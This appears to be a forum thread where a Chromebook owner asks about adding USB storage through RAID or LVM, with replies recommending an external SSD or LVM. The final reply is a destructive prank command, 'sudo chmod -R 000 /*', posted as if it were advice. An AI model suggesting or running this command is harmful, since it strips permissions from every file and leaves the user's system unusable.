So basically how would one expand the systems storage with a USB stick on Ubuntu 16.04

Could I just raid the system drive and USB together inside of Ubuntu or do I need to do it off a bootable USB? will the raid break if I duel boot? And could I Install chrome OS and gallium OS on the raid partition?

main drive is 16gb(hence the question)

Am planning to add a few USB sticks roundaboutly soldered to the inside.

chromebook (GNAWTY) with custom bios

running galliumos 2.0 with the help of chrx.

A usb stick is gonna be pretty slow. Id get a external ssd

If you want to dual boot, just install the os on the usb stick, no point in raid.

If you want to extend storage extend the lvm volume group(or reinstall with lvm, just use lvm, its nice)

No.

You could use lvm or zfs but you'd most likely end up slowing down your entire system.

If you got a usb ssd it would probably be much faster, and you should install the system directly on that.

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*
